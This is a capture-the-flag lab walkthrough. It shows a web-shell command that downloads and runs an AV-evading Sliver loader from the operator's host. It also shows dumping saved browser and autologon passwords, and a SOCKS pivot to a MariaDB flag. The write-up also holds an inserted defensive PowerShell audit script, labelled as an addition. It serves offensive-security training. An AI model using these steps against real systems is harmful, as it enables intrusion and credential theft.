Staged
Objective / Scope
You are a member of the Hack Smarter Red Team and have been assigned to perform a black-box penetration test against a client's critical infrastructure. The scope is strictly limited to the following hostnames:
web.hacksmarter: Public-facing Windows Web Server (Initial Access Point). Windows Defender is enabled.
sqlsrv.hacksmarter: Internal Linux MySQL Database Server.
The exercise is considered complete upon successful retrieval of the final flag from sqlsrv.hacksmarter.
Any activity outside of these two hosts or their associated network interfaces is strictly prohibited.
Lab Starting Point
At the beginning of the engagement, another operator exploited a file upload vulnerability and provided you with a web shell.
http://web.hacksmarter/hacksmarter/shell.php?cmd=whoami
Sliver session as j.smith
Use Sliver to generate shellcode
generate --mtls 10.200.24.149 --format shellcode --save raw.bin --os windows
Encrypt the shellcode
encrypt_shellcode raw.bin payload.bin 0x4A
[+] Encrypted raw.bin → payload.bin with key 0x4A
Build with Nim
nim c -d:release --app:gui --opt:size --os:windows --cpu:amd64 \
--gcc.exe:x86_64-w64-mingw32-gcc \
--gcc.linkerexe:x86_64-w64-mingw32-gcc \
--passL:"-s -Wl,--strip-all" \
--stackTrace:off --lineTrace:off \
~/tools/shellcode_stuff/loader.nim
Host payload
python -m http.server
Since we started with a web shell, use it to download and execute the payload, which gives us a Sliver session.
http://web.hacksmarter/hacksmarter/shell.php?cmd=curl+http://10.200.24.149:8000/loader.exe+-o+c:\users\j.smith\loader.exe+%26+c:\users\j.smith\loader.exe
Sliver Session
[*] Session fc96f6f1 EXPENSIVE_OCEAN - 10.0.22.99:49785 (EC2AMAZ-IBNMCK4) - windows/amd64 -
sliver > use fc96f6f1-a723-490d-82a8-554a2ceb5dcd
[*] Active session EXPENSIVE_OCEAN (fc96f6f1-a723-490d-82a8-554a2ceb5dcd)
sliver (EXPENSIVE_OCEAN) > whoami
Logon ID: EC2AMAZ-IBNMCK4\j.smith
[*] Current Token ID: EC2AMAZ-IBNMCK4\j.smith
Find credentials
From the sliver session, we can enumerate and hunt for privilege escalation paths.
sharpchrome (find b.morgan cleartext password)
sliver (EXPENSIVE_OCEAN) > sharpchrome logins /browser:edge
[*] sharpchrome output:
[*] Action: Edge Saved Logins Triage
[*] Triaging Edge Logins for current user
[*] AES state key file : C:\Users\j.smith\AppData\Local\Microsoft\Edge\User Data\Local State
[*] AES state key : 932AA2396C91CCBE6589539D2B5AA18F95C9749B1CCBBD750B3DB51AA73366BE
--- Credential (Path: C:\Users\j.smith\AppData\Local\Microsoft\Edge\User Data\Default\Login Data) ---
file_path,signon_realm,origin_url,date_created,times_used,username,password
C:\Users\j.smith\AppData\Local\Microsoft\Edge\User Data\Default\Login Data,https://hacksmarter.org/,https://hacksmarter.org/,9/26/2025 3:39:38 PM,13403374778039617,b.morgan,O3KA6B#y1$15
We retrieved stored credentials from the Edge browser:
b.morgan:O3KA6B#y1$15
sharpup (find p.richardson cleartext password)
sliver (EXPENSIVE_OCEAN) > sharpup audit
[*] sharpup output:
=== SharpUp: Running Privilege Escalation Checks ===
=== Registry AutoLogons ===
DefaultDomainName:
DefaultUserName: p.richardson
DefaultPassword: ^^CThacker66
AltDefaultDomainName:
AltDefaultUserName:
AltDefaultPassword:
=== Abusable Token Privileges ===
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
=== Services with Unquoted Paths ===
Service 'NoteTakingSvc' (StartMode: Automatic) has executable 'C:\Program Files\Note Taking App\notes.exe', but 'C:\Program' is modifable.
=== Modifiable Service Binaries ===
Service 'Apache2.4' (State: Running, StartMode: Auto) : "C:\xampp\apache\bin\httpd.exe" -k runservice
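The SharpUp output above shows host misconfigurations that a defender can verify and fix directly. The following audit script is an added example, not part of the original writeup or of SharpUp; it assumes it runs from an elevated PowerShell prompt on the Windows host, and the remediation strings it prints are suggested fixes, not commands the writeup ran.

```powershell
# Added audit example (not from the writeup or SharpUp); run elevated on the Windows host.
# 1. Winlogon autologon: DefaultPassword / AltDefaultPassword are cleartext
#    REG_SZ values readable by any local user (how p.richardson's password leaked).
function Get-AutoLogonExposure {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $wl  = Get-ItemProperty -Path $key
    foreach ($prefix in '', 'Alt') {
        $pwName = "${prefix}DefaultPassword"
        if ([string]::IsNullOrEmpty($wl.$pwName)) { continue }
        [pscustomobject]@{
            Finding     = 'Cleartext autologon password'
            Account     = "$($wl.("${prefix}DefaultDomainName"))\$($wl.("${prefix}DefaultUserName"))"
            Registry    = "$key\$pwName"
            Remediation = "Remove-ItemProperty -Path '$key' -Name $pwName   # then store it as an LSA secret (Sysinternals Autologon) or disable AutoAdminLogon"
        }
    }
}

# 2. Unquoted ImagePath with spaces: the loader tries each space-delimited prefix
#    first, so a writable parent directory (SharpUp flagged C:\Program) lets a
#    planted binary start as the service account. Fix: quote the path.
function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if ([string]::IsNullOrEmpty($path) -or $path.StartsWith('"')) { return }
        $m = [regex]::Match($path, '^(.+?\.exe)', 'IgnoreCase')  # executable part only
        if (-not $m.Success -or $m.Groups[1].Value -notmatch ' ') { return }
        $exe     = $m.Groups[1].Value
        $svcArgs = $path.Substring($exe.Length)                   # e.g. ' -k runservice'
        [pscustomobject]@{
            Finding     = 'Unquoted service path'
            Service     = $_.Name
            Executable  = $exe
            Remediation = "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\$($_.Name)' -Name ImagePath -Value '`"$exe`"$svcArgs'"
        }
    }
}

# 3. Edge saved logins are protected only by the user's DPAPI key, so code running
#    as that user (the web shell here) can read them; policy can disable the store.
function Get-EdgePasswordManagerPolicy {
    $polKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Edge'
    $pol = Get-ItemProperty -Path $polKey -ErrorAction SilentlyContinue
    if ($pol.PasswordManagerEnabled -eq 0) { return }
    [pscustomobject]@{
        Finding     = 'Edge password manager not disabled by policy'
        Remediation = "New-Item -Path '$polKey' -Force | Out-Null; Set-ItemProperty -Path '$polKey' -Name PasswordManagerEnabled -Value 0 -Type DWord"
    }
}
& { Get-AutoLogonExposure; Get-UnquotedServicePath; Get-EdgePasswordManagerPolicy } | Format-List
```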
The Objective/Scope section states that sqlsrv.hacksmarter is an internal Linux MySQL database server. Set up a SOCKS5 proxy through the Sliver session and scan to see whether MySQL port 3306 is open.
Move laterally to sqlsrv.hacksmarter
SOCKS5 proxy
This can be started from the Sliver session:
sliver (EXPENSIVE_OCEAN) > socks5 start
[*] Started SOCKS5 127.0.0.1 1081
⚠ In-band SOCKS proxies can be a little unstable depending on protocol
Modify /etc/proxychains.conf to add the SOCKS5 proxy:
[ProxyList]
socks5 127.0.0.1 1081
Scan for the MySQL port on sqlsrv.hacksmarter:
proxychains -q nmap 10.0.22.69 -Pn -sT -p 3306
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-19 11:32 -0500
Nmap scan report for sqlsrv.hacksmarter (10.0.22.69)
Host is up (0.00s latency).
PORT STATE SERVICE
3306/tcp open mysql
Connect to MySQL as p.richardson:
proxychains -q mariadb -u p.richardson -h sqlsrv.hacksmarter -p --skip-ssl
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 40
Server version: 10.6.22-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
Retrieve flag
Enumerate databases
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| hacksmarter_db |
| information_schema |
+--------------------+
2 rows in set (0.051 sec)
MariaDB [(none)]> use hacksmarter_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
Enumerate tables in hacksmarter_db
MariaDB [hacksmarter_db]> show tables;
+--------------------------+
| Tables_in_hacksmarter_db |
+--------------------------+
| final_config |
+--------------------------+
1 row in set (0.053 sec)
MariaDB [hacksmarter_db]> select * from final_config;
+----+-----------------+----------------------------------------+
| id | key_name | key_value |
+----+-----------------+----------------------------------------+
| 1 | admin_api_token | FLAG{b64f49553d5c441652e95697a2c5949e} |
| 2 | system_status | Operational |
+----+-----------------+----------------------------------------+
2 rows in set (0.052 sec)
Submit the flag found in the database.